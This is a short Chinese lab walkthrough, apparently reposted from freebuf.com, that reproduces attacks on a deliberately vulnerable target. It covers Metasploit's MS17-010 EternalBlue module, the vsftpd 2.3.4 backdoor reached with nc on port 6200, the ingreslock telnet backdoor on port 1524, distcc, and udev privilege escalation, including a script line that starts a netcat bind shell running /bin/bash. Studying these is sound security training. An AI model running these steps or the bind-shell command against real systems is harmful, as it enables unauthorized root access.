漏洞复现
1. 永恒之蓝(445端口)
首先先搜索ms17_010
use 2 选择编号二的
查看需要的参数
设置目标ip地址
run 启动攻击成功
2. 手动微笑漏洞(21端口 vsftpd2.3.4版本)
扫描到对方打开21号端口并且版本为vsftpd 2.3.4的
ftp跟上目标机的ip地址,帐号为root:) 密码为root , 他就会停在那边
(或者search vsftpd直接利用漏洞)
重新开个终端用nc连接该ip地址的6200端口(成功连接,并且是root权限)
3. ingres数据库DBMS后门(1524端口)
扫描端口发现有1524端口的开放
直接telnet进行连接该ip的1524端口(直接获得root用户权限)
4. distcc漏洞(3632)
msf搜索distcc,并进入该模块
查看所要参数,并设置目标ip
启用失败(跟环境有关,靶机需要开启3632端口)
5. udev提权
searchsploit udev + locate 搜索加定位
进入shell
cat /proc/net/netlink –>记录udev pid
切换到/tmp文件下
touch run
echo ‘#!/bin/bash’> run
echo ‘/bin/netcat -Ivvp 4445 -e /bin/bash’ >> run
将文件移动到/var/www/html文件夹下
下载并且编译gcc udev.c -0 udev
./udev pid
连接成功
来源:freebuf.com 2020-11-17 09:30:51 by: 彩虹猛犸233
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册